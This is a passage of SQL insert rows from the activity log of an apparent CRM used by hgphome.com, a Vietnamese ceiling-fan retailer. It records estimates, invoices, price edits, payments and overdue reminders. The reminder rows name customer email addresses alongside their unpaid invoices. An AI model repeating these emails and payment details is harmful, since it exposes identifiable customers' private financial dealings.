(1124, 'estimate', 113, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/196\">INV-190-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-12 14:15:52'),
(1125, 'invoice', 196, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-12 14:45:38'),
(1126, 'invoice', 196, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/203\" target=\"_blank\">#203</a>\";}', '1', 'Ho Gia Phat', '2022-10-12 14:45:38'),
(1127, 'estimate', 114, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-12 16:53:51'),
(1128, 'invoice', 197, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-12 16:53:54'),
(1129, 'estimate', 114, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/197\">INV-191-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-12 16:53:54'),
(1130, 'invoice', 198, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-12 23:30:01'),
(1131, 'invoice', 198, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:28:\"Haiku 52 inch Caramel Bamboo\";}', '1', 'Ho Gia Phat', '2022-10-13 05:41:00'),
(1132, 'invoice', 198, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:48:\"Haiku 52 inch Caramel Bamboo - Low Profile Black\";}', '1', 'Ho Gia Phat', '2022-10-13 05:41:00'),
(1133, 'invoice', 198, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:410:\"Sải cánh 132cm (52 inch)   <br />\r\nMàu cánh: Caramel Bamboo    <br />\r\nMàu thân : Low Profile Black   <br />\r\nĐộng cơ EC, công suất 29.3W   <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm   <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)   <br />\r\nBộ đèn LED tuỳ chọn thêm   <br />\r\nThương hiệu: Haiku/USA   <br />\r\n\";i:1;s:357:\"Sải cánh 132cm (52 inch)   \r\nMàu cánh: Caramel Bamboo    \r\nMàu thân : Low Profile Black   \r\nĐộng cơ EC, công suất 29.3W   \r\nĐiều khiển từ xa 7 tốc độ đi kèm   \r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)   \r\nBộ đèn LED tuỳ chọn thêm   \r\nThương hiệu: Haiku/USA\";}', '1', 'Ho Gia Phat', '2022-10-13 05:41:51'),
(1134, 'estimate', 96, 'estimate_activity_client_declined', '', NULL, '', '2022-10-13 05:50:18'),
(1135, 'estimate', 115, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-13 13:46:45'),
(1136, 'estimate', 115, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6500000.00\";i:1;s:7:\"4875000\";}', '1', 'Ho Gia Phat', '2022-10-13 13:49:14'),
(1137, 'estimate', 115, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:42:\"Quạt trần cánh gỗ ONIX 56 Dark Wood\";i:1;s:4:\"4.00\";i:2;s:1:\"3\";}', '1', 'Ho Gia Phat', '2022-10-13 13:49:14'),
(1138, 'estimate', 115, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Quạt trần cao cấp IRIS 60 Black ABS\";}', '1', 'Ho Gia Phat', '2022-10-13 13:49:14'),
(1139, 'invoice', 199, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-13 13:55:21'),
(1140, 'estimate', 115, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/199\">INV-192-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-13 13:55:21'),
(1141, 'estimate', 115, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"4875000.00\";i:1;s:7:\"6500000\";}', '1', 'Ho Gia Phat', '2022-10-13 14:01:11'),
(1142, 'estimate', 115, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"11760000.00\";i:1;s:8:\"16800000\";}', '1', 'Ho Gia Phat', '2022-10-13 14:01:11'),
(1143, 'estimate', 116, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-13 15:10:33'),
(1144, 'estimate', 116, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6500000.00\";i:1;s:10:\"6300000.00\";}', '1', 'Ho Gia Phat', '2022-10-13 15:10:53'),
(1145, 'invoice', 200, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-13 15:10:57'),
(1146, 'estimate', 116, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/200\">INV-193-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-13 15:10:57'),
(1147, 'invoice', 200, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-13 15:18:42'),
(1148, 'invoice', 200, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.725.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/204\" target=\"_blank\">#204</a>\";}', '1', 'Ho Gia Phat', '2022-10-13 15:18:42'),
(1149, 'estimate', 117, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-14 09:14:48'),
(1150, 'estimate', 117, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-10-14 09:19:07'),
(1152, 'estimate', 117, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/201\">INV-194-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-14 09:19:10'),
(1153, 'estimate', 117, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-10-14 09:34:42'),
(1154, 'estimate', 117, 'not_estimate_invoice_deleted', '', '1', 'Ho Gia Phat', '2022-10-14 09:35:01'),
(1155, 'invoice', 202, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-14 09:36:43'),
(1156, 'estimate', 117, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/202\">INV-194-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-14 09:36:43'),
(1157, 'invoice', 170, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2022-10-14 09:44:22'),
(1158, 'invoice', 175, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2022-10-14 09:44:22'),
(1159, 'invoice', 131, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>khongco1@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-10-14 09:44:28'),
(1160, 'invoice', 135, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>omanizen@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-10-14 09:44:34'),
(1161, 'invoice', 144, 'user_sent_overdue_reminder', 'a:2:{i:0;s:49:\"<custom_data>hien.vo@alliancevn.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-10-14 09:44:40'),
(1162, 'invoice', 145, 'user_sent_overdue_reminder', 'a:2:{i:0;s:42:\"<custom_data>info@savimec.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-10-14 09:44:46'),
(1163, 'invoice', 197, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-10-14 10:10:30'),
(1164, 'invoice', 189, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-10-14 10:10:46'),
(1165, 'invoice', 161, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-10-14 10:13:01'),
(1166, 'invoice', 55, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-10-14 10:13:19'),
(1167, 'invoice', 175, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-10-14 10:13:39'),
(1168, 'estimate', 118, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-14 12:41:32'),
(1169, 'invoice', 203, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-14 12:41:40'),
(1170, 'estimate', 118, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/203\">INV-195-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-14 12:41:40'),
(1171, 'invoice', 203, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:49:\"Chi phí vận chuyển giao hàng ngoại tỉnh\";}', '1', 'Ho Gia Phat', '2022-10-14 14:13:03'),
(1172, 'invoice', 203, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-14 15:49:53'),
(1173, 'invoice', 203, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/205\" target=\"_blank\">#205</a>\";}', '1', 'Ho Gia Phat', '2022-10-14 15:49:53'),
(1174, 'estimate', 119, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-15 13:37:48'),
(1175, 'invoice', 204, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-15 13:38:12'),
(1176, 'estimate', 119, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/204\">INV-196-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-15 13:38:12'),
(1177, 'invoice', 204, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-15 13:38:41'),
(1178, 'invoice', 204, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"81.350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/206\" target=\"_blank\">#206</a>\";}', '1', 'Ho Gia Phat', '2022-10-15 13:38:41'),
(1179, 'estimate', 120, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-17 09:30:46'),
(1180, 'invoice', 205, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-17 09:31:00'),
(1181, 'estimate', 120, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/205\">INV-197-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-17 09:31:00'),
(1182, 'invoice', 205, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-17 09:31:59'),
(1183, 'invoice', 205, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/207\" target=\"_blank\">#207</a>\";}', '1', 'Ho Gia Phat', '2022-10-17 09:31:59'),
(1184, 'invoice', 191, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-17 12:03:37'),
(1185, 'invoice', 191, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.540.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/208\" target=\"_blank\">#208</a>\";}', '1', 'Ho Gia Phat', '2022-10-17 12:03:37'),
(1186, 'estimate', 121, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-18 12:54:08'),
(1187, 'invoice', 206, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-18 12:55:48'),
(1188, 'estimate', 121, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/206\">INV-198-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-18 12:55:48'),
(1189, 'invoice', 203, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:1:\"5\";}', '1', 'Ho Gia Phat', '2022-10-18 17:17:24'),
(1190, 'invoice', 202, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-18 17:42:24'),
(1191, 'invoice', 202, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.375.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/209\" target=\"_blank\">#209</a>\";}', '1', 'Ho Gia Phat', '2022-10-18 17:42:24'),
(1192, 'estimate', 118, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:49:\"Chi phí vận chuyển giao hàng ngoại tỉnh\";}', '1', 'Ho Gia Phat', '2022-10-18 17:44:36'),
(1193, 'invoice', 203, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"5\";i:1;s:2:\"20\";}', '1', 'Ho Gia Phat', '2022-10-18 17:45:03'),
(1194, 'invoice', 203, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-18 17:45:34'),
(1195, 'invoice', 203, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"23.864.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/210\" target=\"_blank\">#210</a>\";}', '1', 'Ho Gia Phat', '2022-10-18 17:45:34'),
(1196, 'estimate', 122, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-19 11:03:45'),
(1197, 'invoice', 207, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-19 11:03:49'),
(1198, 'estimate', 122, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/207\">INV-199-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-19 11:03:49'),
(1199, 'invoice', 208, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-10-24 13:18:01'),
(1200, 'invoice', 209, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-10-24 13:33:22'),
(1201, 'invoice', 208, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:129:\"Sải cánh 112cm \r\nĐộng cơ DC, 38W\r\nSố cánh: 4 cánh nhựa trong\r\nMàu thân quạt: Gold\r\nĐiều khiển 6 tốc độ\";}', '1', 'Ho Gia Phat', '2022-10-24 14:24:01'),
(1202, 'invoice', 209, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:8:\"DC-6028A\";}', '1', 'Ho Gia Phat', '2022-10-24 14:41:39'),
(1203, 'invoice', 208, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-10-24 14:41:39'),
(1204, 'invoice', 209, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:8:\"DC-6028A\";}', '1', 'Ho Gia Phat', '2022-10-24 14:41:52'),
(1205, 'invoice', 209, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-24 14:42:30'),
(1206, 'invoice', 209, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2022-10-24 14:42:30'),
(1207, 'invoice', 209, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-10-25 10:19:02'),
(1208, 'invoice', 209, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.250.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/211\" target=\"_blank\">#211</a>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-10-25 10:19:02'),
(1209, 'invoice', 210, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-26 17:42:41'),
(1210, 'invoice', 211, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2022-10-27 12:02:45'),
(1211, 'invoice', 211, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2022-10-27 12:02:59'),
(1212, 'invoice', 211, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/212\" target=\"_blank\">#212</a>\";}', '17', 'Loan Nguyễn', '2022-10-27 12:02:59'),
(1213, 'invoice', 204, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/213\" target=\"_blank\">#213</a>\";}', '17', 'Loan Nguyễn', '2022-10-27 13:47:05'),
(1214, 'invoice', 204, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"213\";i:1;s:12:\"1.000.000 đ\";}', '1', 'Ho Gia Phat', '2022-10-27 13:50:01'),
(1215, 'estimate', 123, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-28 08:23:23'),
(1216, 'invoice', 212, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-28 08:23:33'),
(1217, 'estimate', 123, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/212\">INV-203-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-28 08:23:33'),
(1218, 'invoice', 212, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"15\";}', '1', 'Ho Gia Phat', '2022-10-28 09:22:36'),
(1219, 'invoice', 212, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:217:\"Sải cánh 132cm (52inch)   <br />\r\nĐộng cơ EC, công suất 20.9W   <br />\r\nMàu thân/cánh: Trắng <br />\r\nĐiều khiển từ xa 7 cấp đi kèm   <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V;\";i:1;s:220:\"Sải cánh 132cm (52inch)   \r\nĐộng cơ EC, công suất 20.9W   \r\nMàu thân/cánh: Trắng \r\nĐiều khiển từ xa 7 cấp đi kèm   \r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V\r\nThương hiệu: Haiku/USA\";}', '1', 'Ho Gia Phat', '2022-10-28 09:29:24'),
(1220, 'estimate', 124, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-29 10:57:44'),
(1221, 'invoice', 213, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-29 10:57:47'),
(1222, 'estimate', 124, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/213\">INV-204-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-29 10:57:47'),
(1223, 'invoice', 213, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '1', 'Ho Gia Phat', '2022-10-29 11:01:36'),
(1224, 'estimate', 125, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-10-29 15:15:44'),
(1225, 'invoice', 214, 'invoice_activity_created', '', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2022-10-31 09:01:45'),
(1226, 'estimate', 125, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/214\">INV-205-22</a>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2022-10-31 09:01:45'),
(1227, 'estimate', 104, 'estimate_activity_client_declined', '', NULL, '', '2022-10-31 09:07:12'),
(1228, 'invoice', 214, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:14:\"Bộ đèn led\";}', '1', 'Ho Gia Phat', '2022-10-31 09:27:34'),
(1229, 'invoice', 214, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:51:\"Bộ điều khiển DC 6 tốc đọ Tổ chức đào tạo WIT \";}', '1', 'Ho Gia Phat', '2022-10-31 09:27:34'),
(1230, 'invoice', 214, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:28:\"Bộ đèn LED quạt trần\";}', '1', 'Ho Gia Phat', '2022-10-31 09:27:34'),
(1231, 'invoice', 214, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:50:\"Bộ điều khiển DC 6 tốc độ Mountair Air\";}', '1', 'Ho Gia Phat', '2022-10-31 09:27:34'),
(1232, 'invoice', 212, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '15', 'Linh Nguyen Thuy', '2022-10-31 10:40:00'),
(1233, 'invoice', 212, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"18.360.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/214\" target=\"_blank\">#214</a>\";}', '15', 'Linh Nguyen Thuy', '2022-10-31 10:40:00'),
(1234, 'invoice', 214, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '15', 'Linh Nguyen Thuy', '2022-10-31 11:12:50'),
(1235, 'invoice', 214, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/215\" target=\"_blank\">#215</a>\";}', '15', 'Linh Nguyen Thuy', '2022-10-31 11:12:50'),
(1236, 'estimate', 126, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-11-01 14:42:46'),
(1237, 'invoice', 215, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-11-01 14:43:26'),
(1238, 'estimate', 126, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/215\">INV-206-22</a>\";}', '1', 'Ho Gia Phat', '2022-11-01 14:43:26'),
(1239, 'invoice', 215, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"10\";}', '1', 'Ho Gia Phat', '2022-11-01 14:44:02'),
(1240, 'invoice', 215, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:1:\"5\";}', '1', 'Ho Gia Phat', '2022-11-01 14:44:02'),
(1241, 'invoice', 215, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-01 14:44:19'),
(1242, 'invoice', 215, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"98.820.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/216\" target=\"_blank\">#216</a>\";}', '1', 'Ho Gia Phat', '2022-11-01 14:44:19'),
(1243, 'invoice', 213, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-11-04 12:30:51'),
(1244, 'invoice', 207, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-11-04 12:31:10'),
(1245, 'invoice', 206, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-04 12:31:37'),
(1246, 'invoice', 206, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"850.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/217\" target=\"_blank\">#217</a>\";}', '1', 'Ho Gia Phat', '2022-11-04 12:31:37'),
(1247, 'invoice', 199, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-11-04 12:31:51'),
(1248, 'estimate', 120, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-04 12:34:00'),
(1249, 'estimate', 120, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:715:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '1', 'Ho Gia Phat', '2022-11-04 12:34:00'),
(1250, 'estimate', 127, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2022-11-07 16:51:14'),
(1251, 'invoice', 216, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-08 08:55:44'),
(1252, 'invoice', 216, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:253:\"Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nMàu thân quạt: trắng  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  <br />\r\n  Điều khiển từ xa 5 tốc độ đi kèm \";i:1;s:228:\"Sải cánh 132cm ( ~ 52inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  \r\nMàu thân quạt: trắng  \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  \r\n  Điều khiển từ xa 5 tốc độ đi kèm\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-08 09:04:56'),
(1253, 'invoice', 216, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"350000.00\";i:1;s:6:\"500000\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-11-08 09:04:56'),
(1254, 'invoice', 131, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>khongco1@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-08 11:46:22'),
(1255, 'invoice', 135, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>omanizen@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-08 11:46:26'),
(1256, 'invoice', 144, 'user_sent_overdue_reminder', 'a:2:{i:0;s:49:\"<custom_data>hien.vo@alliancevn.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-08 11:46:30'),
(1257, 'invoice', 145, 'user_sent_overdue_reminder', 'a:2:{i:0;s:42:\"<custom_data>info@savimec.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-08 11:46:34'),
(1258, 'invoice', 216, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6300000.00\";i:1;s:7:\"4095000\";}', '1', 'Ho Gia Phat', '2022-11-08 12:52:42'),
